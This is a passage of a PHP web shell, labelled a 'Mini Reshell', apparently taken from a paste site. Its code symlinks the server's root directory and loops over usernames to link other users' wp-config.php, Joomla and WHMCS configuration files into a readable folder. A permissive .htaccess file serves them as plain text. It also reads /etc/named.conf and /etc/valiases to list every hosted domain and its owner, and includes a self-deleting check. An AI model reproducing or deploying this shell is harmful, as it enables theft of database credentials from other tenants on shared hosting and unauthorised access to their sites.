  713. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  714. $g = fopen('hkc/.htaccess','w');
  715. fwrite($g,$rr);
  716. $hkc = symlink("/","hkc/root");
  717. $rt="<a href=hkc/root><font color=white size=3 face=\"Tahoma\"> Boxed</font></a>";
  718. echo "See for folder symlink <br><u>$rt</u>";
  719. $dir=mkdir('hkc',0777);
  720. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  721. $f = fopen('hkc/.htaccess','w');
  722. fwrite($f,$r);
  723. $consym="<a href=hkc/><font color=white size=3 face=\"Tahoma\">Configuration files</font></a>";
  724. echo "<br>Result<br><u><font color=red size=2 face=\"Tahoma\">$consym</font></u>";
  725. $usr=explode("\n",$_POST['user']);
  726. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  727. foreach($usr as $uss )
  728. {
  729. $us=trim($uss);
  730. foreach($configuration as $c)
  731. {
  732. $rs="/home/".$us."/public_html/".$c;
  733. $r="hkc/".$us." .. ".$c;
  734. symlink($rs,$r);
  735. }
  736. }
  737. }
  738. }
  739. ?>
  740.  
  741.  
  742. <?php
  743. //domain viewer
  744. if(isset($_GET['beby']) && ($_GET['beby'] == 'domain'))
  745. {
  746. ?>
  747. <form action="?beby=domain" method="post">
  748. <?php
  749. //radable public_html
  750. echo "<br><br>";
  751. $file = @implode(@file("/etc/named.conf"));
  752. if(!$file){ die("<font color='green'># can't ReaD -> [ /etc/named.conf ] </font>
  753.  
  754. </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  755. <br><center>$nick Mini Reshell</center>
  756. "); }
  757. preg_match_all("#named/(.*?).db#",$file ,$r);
  758. $domains = array_unique($r[1]);
  759. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  760. check();
  761. echo ' <center>
  762. [+] Here We Have : [<font style=color:#00FF00>".count($domains)."</font>] Listed Domains In localhost.</center>
  763. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><td style="background:darkred;color:white;text-align:center;"><b>List Of Users</b></td> <td style="background:darkred;color:white;text-align:center;border-left:1px solid white;"> <b><font style=color:#F80;List Of Domains</b></td></tr> ';
  764. foreach($domains as $domain)
  765. {
  766. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  767. echo "<tr><td><a href='http://www.$domain' target='_blank' style='color:#00FF00;'>$domain</a></td><td style='border-left:1px solid white;'>".$user['name']."</td></tr>";
  768. }
  769. echo "</table>";
  770. //redable public_html
  771. }
  772.  
  773. ?>
  774.  
  775.  
  776.  
  777. </div><br><br><center><b><font color=red>&copy 2020 - 2021 Recoded By <?php echo $nick; ?></font></center><b>
  778. <br><center><?php echo $nick; ?> Mini Reshell</center>
  779.  
  780. <?php
  781. //permision
  782. function perms($file){
  783. $perms = fileperms($file);
  784.  
  785. if (($perms & 0xC000) == 0xC000) {
  786. // Socket
  787. $info = 's';
  788. } elseif (($perms & 0xA000) == 0xA000) {
  789. // Symbolic Link
  790. $info = 'l';
  791. } elseif (($perms & 0x8000) == 0x8000) {
  792. // Regular
  793. $info = '-';
  794. } elseif (($perms & 0x6000) == 0x6000) {
  795. // Block special
  796. $info = 'b';
  797. } elseif (($perms & 0x4000) == 0x4000) {
  798. // Directory
  799. $info = 'd';
  800. } elseif (($perms & 0x2000) == 0x2000) {
  801. // Character special
  802. $info = 'c';
  803. } elseif (($perms & 0x1000) == 0x1000) {
  804. // FIFO pipe
  805. $info = 'p';
  806. } else {
  807. // Unknown
  808. $info = 'u';
  809. }
  810.  
  811. // Owner
  812. $info .= (($perms & 0x0100) ? 'r' : '-');
  813. $info .= (($perms & 0x0080) ? 'w' : '-');
  814. $info .= (($perms & 0x0040) ?
  815. (($perms & 0x0800) ? 's' : 'x' ) :
  816. (($perms & 0x0800) ? 'S' : '-'));
  817.  
  818. // Group
  819. $info .= (($perms & 0x0020) ? 'r' : '-');
  820. $info .= (($perms & 0x0010) ? 'w' : '-');
  821. $info .= (($perms & 0x0008) ?
  822. (($perms & 0x0400) ? 's' : 'x' ) :
  823. (($perms & 0x0400) ? 'S' : '-'));
  824.  
  825. // World
  826. $info .= (($perms & 0x0004) ? 'r' : '-');
  827. $info .= (($perms & 0x0002) ? 'w' : '-');
  828. $info .= (($perms & 0x0001) ?
  829. (($perms & 0x0200) ? 't' : 'x' ) :
  830. (($perms & 0x0200) ? 'T' : '-'));
  831.  
  832. return $info;
  833. }
  834. ?>
Add Comment
Please, Sign In to add comment